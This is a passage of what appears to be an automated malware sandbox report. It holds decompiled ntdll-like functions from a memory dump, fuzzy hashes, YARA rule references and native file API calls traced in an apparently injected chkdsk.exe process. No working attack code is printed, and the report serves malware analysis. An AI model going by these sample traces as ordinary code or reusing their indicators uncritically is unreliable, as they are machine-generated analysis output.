0x008a9176
0x008a9176
0x00000000
0x008a9160
0x008b23c6
0x008b23cb
0x008b23ce
0x008b23d7
0x008b23d7
0x008b23ad
0x008b2390
0x008b2373
0x008b233f
0x008b233f
0x00000000
0x008b233f
0x008b2291
0x008b2291
0x008b2293
0x008b2295
0x008b229a
0x008b22a1
0x008b22a3
0x008b22a7
0x008b22a9
0x00000000
0x00000000
0x008b22ab
0x008b22ad
0x008b22af
0x00000000
0x00000000
0x00000000
0x008b22af
0x008b22b1
0x008b22b4
0x008b22b4
0x008b22b6
0x00000000
0x00000000
0x00000000
0x00000000
0x008b22b6
0x008b228f
0x00000000
0x008b226d
0x008753cb
0x008753ce
0x008753d0
0x008753d4
0x008753d6
0x00000000
0x008753d8
0x008753e3
0x008753ea
0x008753ea
0x008753d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B22F4

Strings

RTL: Re-Waiting, xrefs: 008B2328
RTL: Resource at %p, xrefs: 008B230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008B22FC

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 5ff10f98bc6c096f4818595e759638e5ae89922874f6ac668563f836c8dedc42
Instruction ID: 600517cdec4b725ecc61dbbeadc4832de0abeb51c93c90ce8a4aa3d4cbc10385
Opcode Fuzzy Hash: 5ff10f98bc6c096f4818595e759638e5ae89922874f6ac668563f836c8dedc42
Instruction Fuzzy Hash: 28512671600A056BEF11AB68CC81FA677D8FF59364F104229FD08DB395EAA5EC4187A1

Uniqueness

Uniqueness Score: -1.00%

Function 0087EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0087EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0086DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x93793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E008516C0(_t39);
				} else {
					_t40 = E0084F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00893915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E008501A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x93793c; // 0x0
								_push(_t85);
								_t44 = E00851F28(_t71);
							} else {
								_t44 = E0084F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00893915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E008D2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0087EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00894FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E008A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E008A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9320c0;
								if(_t85 != 0x9320c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E008D217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E008A3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0087ec56
0x0087ec56
0x0087ec56
0x0087ec5c
0x0087ec64
0x008b23e6
0x008b23eb
0x008b23eb
0x0087ec6a
0x0087ec6c
0x0087ec6f
0x008b23f3
0x008b23f8
0x008b23fa
0x008b23fc
0x0087ec75
0x0087ec76
0x0087ec76
0x0087ec7b
0x0087ec7c
0x0087ec7e
0x008b2406
0x008b2407
0x008b240c
0x008b240d
0x008b240d
0x008b240d
0x008b2414
0x008b2417
0x008b241e
0x008b2435
0x008b2438
0x008b243c
0x008b243f
0x008b2442
0x008b2443
0x008b2446
0x008b2449
0x008b2453
0x008b2455
0x008b245b
0x008b245b
0x0087eb99
0x0087eb99
0x0087eb9c
0x0087eb9d
0x0087eb9f
0x0087eba2
0x008b2465
0x008b246b
0x008b246d
0x0087eba8
0x0087eba9
0x0087eba9
0x0087ebae
0x0087ebb3
0x0087ebb9
0x0087ebbb
0x008b2513
0x008b2514
0x008b2519
0x008b251b
0x0087ec2a
0x0087ec2d
0x0087ec33
0x0087ec36
0x0087ec3a
0x0087ec3e
0x0087ec40
0x0087ec47
0x0087ec47
0x0087ec40
0x008522c6
0x0087ebc1
0x0087ebc1
0x0087ebc5
0x0087ec9a
0x0087ec9a
0x0087ebd6
0x0087ebd6
0x00000000
0x0087ebbb
0x008b2477
0x008b247c
0x008b2486
0x008b248b
0x008b2496
0x008b249b
0x008b249d
0x008b24a0
0x008b24a3
0x008b24aa
0x008b24aa
0x008b24a5
0x008b24a5
0x008b24a5
0x008b24ac
0x008b24af
0x008b24b0
0x008b24b3
0x008b24b9
0x008b24ba
0x008b24bb
0x008b24c6
0x008b24cb
0x008b24cd
0x008b24d0
0x008b24d1
0x008b24d4
0x008b24d6
0x008b24d9
0x008b24d9
0x008b24dc
0x008b24df
0x008b24e1
0x008b24e7
0x008b24e9
0x008b24ec
0x008b24ef
0x008b24f2
0x008b24f2
0x008b24ef
0x008b24e7
0x008b24fa
0x008b24ff
0x008b2501
0x008b2503
0x008b2506
0x008b250b
0x0087eb8c
0x0087eb93
0x00000000
0x00000000
0x0087eb93
0x00000000
0x0087eb99
0x0087ec85
0x0087ec85
0x0087ec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 008B24FA
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008B24BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 008B248D

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 8bfa813e61fb0cfaa50a148e32a00d203cf081eeac4fe5ddd34fdd37d0da5aca
Instruction ID: 0dc2bc009b5d2f1ac6e333faad7182d170ef8b86663718ee7fd7a4c7d0a7552d
Opcode Fuzzy Hash: 8bfa813e61fb0cfaa50a148e32a00d203cf081eeac4fe5ddd34fdd37d0da5aca
Instruction Fuzzy Hash: 6641E870600204ABDB20DFA8DC85FAA7BA8FF49320F208645F559DB7D1D734E9418B66

Uniqueness

Uniqueness Score: -1.00%

Function 0088FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0088FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0088EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0088EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0088685D(_t167, 4) == 0) {
								if(E0088685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0088685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0088685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00868980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0085DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0088EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0088EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x0088fcd1
0x0088fcd6
0x0088fcd9
0x0088fcdc
0x0088fcdf
0x0088fce2
0x0088fce5
0x0088fce8
0x0088fceb
0x0088fced
0x0088fced
0x0088fcf3
0x00000000
0x00000000
0x0088fcfc
0x0088fcfe
0x0088fdc1
0x008becbd
0x00000000
0x008beccc
0x008beccc
0x008becd2
0x00000000
0x00000000
0x008becdf
0x008bece0
0x008bece4
0x008beceb
0x008becee
0x008beca8
0x008beca8
0x008becaa
0x0088fd76
0x0088fd79
0x0088fdb4
0x0088fdb5
0x0088fdb6
0x00000000
0x0088fdb6
0x0088fd7e
0x008becfc
0x0088fe2f
0x00000000
0x0088fe2f
0x008bed08
0x008bed0f
0x008bed17
0x008bed1b
0x00000000
0x008bed1b
0x0088fd88
0x00000000
0x00000000
0x0088fd94
0x0088fd99
0x0088fda1
0x00000000
0x00000000
0x0088fdb0
0x00000000
0x0088fdb0
0x008becbd
0x0088fdc7
0x0088fdcb
0x00000000
0x0088fdd7
0x0088fde3
0x0088fe06
0x008a1fe7
0x00000000
0x00000000
0x008a1fef
0x008a1ff0
0x008a1ff4
0x008a1ff7
0x008a1ffa
0x008a1ffd
0x008a2000
0x00000000
0x00000000
0x008becf1
0x00000000
0x008becf1
0x00000000
0x0088fe06
0x0088fde8
0x0088fdec
0x0088fdef
0x0088fdf2
0x00000000
0x0088fdf2
0x0088fdcb
0x0088fd04
0x0088fd05
0x008bec67
0x00000000
0x00000000
0x008bec6f
0x00000000
0x008bec6f
0x0088fd13
0x0088fd3c
0x0088fd40
0x008bec75
0x008bec7a
0x00000000
0x008bec8a
0x008bec8a
0x008bec90
0x008becb2
0x0088fd73
0x0088fd73
0x00000000
0x0088fd73
0x008bec95
0x00000000
0x00000000
0x008beca1
0x008beca4
0x008beca5
0x00000000
0x008beca5
0x008bec7a
0x0088fd4a
0x00000000
0x0088fd6e
0x0088fd6e
0x0088fd71
0x00000000
0x0088fd71
0x0088fd4a
0x0088fd21
0x0089a3a1
0x00000000
0x0089a3a1
0x0088fd36
0x008a200b
0x008a2012
0x00000000
0x00000000
0x008a2018
0x00000000
0x008a2018
0x00000000
0x0088fd36
0x0088fe0f
0x0088fe16
0x0089a3ad
0x00000000
0x00000000
0x0089a3b3
0x0089a3b3
0x0088fe1f
0x008bed25
0x008bed86
0x00000000
0x00000000
0x008bed91
0x008bed95
0x008bed95
0x008bed9a
0x008bedad
0x008bedb3
0x008bedba
0x008bedc4
0x008bedc9
0x00000000
0x008bedcc
0x008bed2a
0x008bed55
0x00000000
0x00000000
0x008bed61
0x008bed66
0x008bed6e
0x00000000
0x00000000
0x008bed7d
0x00000000
0x008bed7d
0x008bed30
0x00000000
0x00000000
0x008bed3c
0x008bed43
0x008bed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 0088FD94

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: cfac600704774685271467b141e37622a5a52eab989a4f9751c855e79601add1
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 15915B31D0020AEFDF24EF98C8456EEB7B4FF95314F24807AD611EA263E7705A558B91

Uniqueness

Uniqueness Score: -1.00%

Function 0088FE4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0088FE4F(void* __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				void* _t18;
				signed int _t26;
				intOrPtr _t31;
				void* _t37;
				intOrPtr* _t38;
				intOrPtr _t39;
				void* _t40;
				signed int _t43;
				void* _t44;

				_t37 = __edx;
				_t15 =  *0x932088; // 0x7768e72b
				_v8 = _t15 ^ _t43;
				_t17 = _a4;
				_t31 = _a12;
				_t38 = _a16;
				if(_a4 == 0 || _t38 == 0) {
					L7:
					_t18 = 0xc000000d;
				} else {
					if(_t31 == 0) {
						if( *_t38 == _t31) {
							goto L3;
						} else {
							goto L7;
						}
					} else {
						L3:
						_t40 = E0088FED6(_t17,  &_v52);
						if(_a8 != 0) {
							_t26 = E00887707(_t40,  &_v8 - _t40 >> 1, L":%u", _a8 & 0x0000ffff);
							_t44 = _t44 + 0x10;
							_t40 = _t40 + _t26 * 2;
						}
						_t39 = (_t40 -  &_v52 >> 1) + 1;
						if( *_t38 < _t39) {
							 *_t38 = _t39;
							goto L7;
						} else {
							E00852340(_t31,  &_v52, _t39 + _t39);
							 *_t38 = _t39;
							_t18 = 0;
						}
					}
				}
				return E0085E1B4(_t18, _t31, _v8 ^ _t43, _t37, _t38, _t39);
			}

0x0088fe4f
0x0088fe57
0x0088fe5e
0x0088fe61
0x0088fe65
0x0088fe6a
0x0088fe6f
0x0088feca
0x0088feca
0x0088fe75
0x0088fe77
0x008bea62
0x00000000
0x008bea68
0x00000000
0x008bea68
0x0088fe7d
0x0088fe7d
0x0088fe8c
0x0088fe8e
0x008bea87
0x008bea8c
0x008bea8f
0x008bea8f
0x0088fe9b
0x0088fe9e
0x008bea97
0x00000000
0x0088fea4
0x0088fead
0x0088feb5
0x0088feb7
0x0088feb7
0x0088fe9e
0x0088fe77
0x0088fec7

APIs

Part of subcall function 0088FED6: ___swprintf_l.LIBCMT ref: 0088FEFD

___swprintf_l.LIBCMT ref: 008BEA87

Strings

+hw, xrefs: 0088FE57
:%u, xrefs: 008BEA7E

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: +hw$:%u
API String ID: 48624451-2661910675
Opcode ID: 7b597db51c87832104025d99b1b73ab55db8df4bcffe9f887fd26f3e7154a5aa
Instruction ID: 0d893f5803c6e31b8a09321b7f431bda6c1f1e7c75a0ab62c44058afdaebdd22
Opcode Fuzzy Hash: 7b597db51c87832104025d99b1b73ab55db8df4bcffe9f887fd26f3e7154a5aa
Instruction Fuzzy Hash: EB118476510229EBCB10FEA8DC449FBB7ACFB54700B54452AF945D7252EB30E918CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: chkdsk.exe PID: 1772 Parent PID: 1388 chkdsk.exeCOMMON

Executed Functions

Function 000981AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD

Strings

.z`, xrefs: 000981ED, 000981F8

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: be467d795b3f1236675c6ab5462b7f98b64f96efa21770e07398002ae07e21e7
Instruction ID: a4e3b0d3f7f39f9b1a9b2dfaf0a3665acc1363eaf29fdcf0e05561d335b6b01d
Opcode Fuzzy Hash: be467d795b3f1236675c6ab5462b7f98b64f96efa21770e07398002ae07e21e7
Instruction Fuzzy Hash: 9301B6B2201108ABCB48CF99DC84EEB77A9AF8C754F158248FA1D97281C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000981B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD

Strings

.z`, xrefs: 000981ED, 000981F8

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 6fa3522381f922765747cb413a560a638f34a07a77bac4188ecd542ea8fada8f
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 3DF0B6B2201108ABCB08CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 000982DA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305

Strings

=, xrefs: 000982FC, 00098304

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: =
API String ID: 3535843008-3560468456
Opcode ID: 742aa52a4b39b2a5182a73938a5aed70991b603eef2c896a1a1f646a955be2ca
Instruction ID: 5c1a7d900fef0c9bccb8beb1ca444cbb31e051fdaa4d87bd98355408bc0ac379
Opcode Fuzzy Hash: 742aa52a4b39b2a5182a73938a5aed70991b603eef2c896a1a1f646a955be2ca
Instruction Fuzzy Hash: F7E08C76200210ABDB10DFA4CC84EE77B68EF44320F118059BA199B282C530E60087E0

Uniqueness

Uniqueness Score: -1.00%

Function 000982E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305

Strings

=, xrefs: 000982FC, 00098304

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: =
API String ID: 3535843008-3560468456
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 9045585dbcf6f62545025eb08aed1c60fbdcfac0c4e7976329d12629e07866ea
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: BFD012752002146BDB10EF99CC45ED7775CEF44750F154455BA189B342C930F90087E0

Uniqueness

Uniqueness Score: -1.00%

Function 0009825C, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 21d2671e23f35e1acdb441a679d7f95d4574024804aae236baa62d52ff200951
Instruction ID: e9c267cc0c91a4d95102aa46a652c6f0b12f140c00e16258be681138e1c122c1
Opcode Fuzzy Hash: 21d2671e23f35e1acdb441a679d7f95d4574024804aae236baa62d52ff200951
Instruction Fuzzy Hash: 57F092B2210208AFDB14DF89DC91EEB77ADAF8C754F158649BA1D97241DA30E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00098260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5

Memory Dump Source

Source File: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: bed45cf130e08865842418422f5209c84d04630db3e9acde41b4be393811b9d6
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 6CF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00098390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

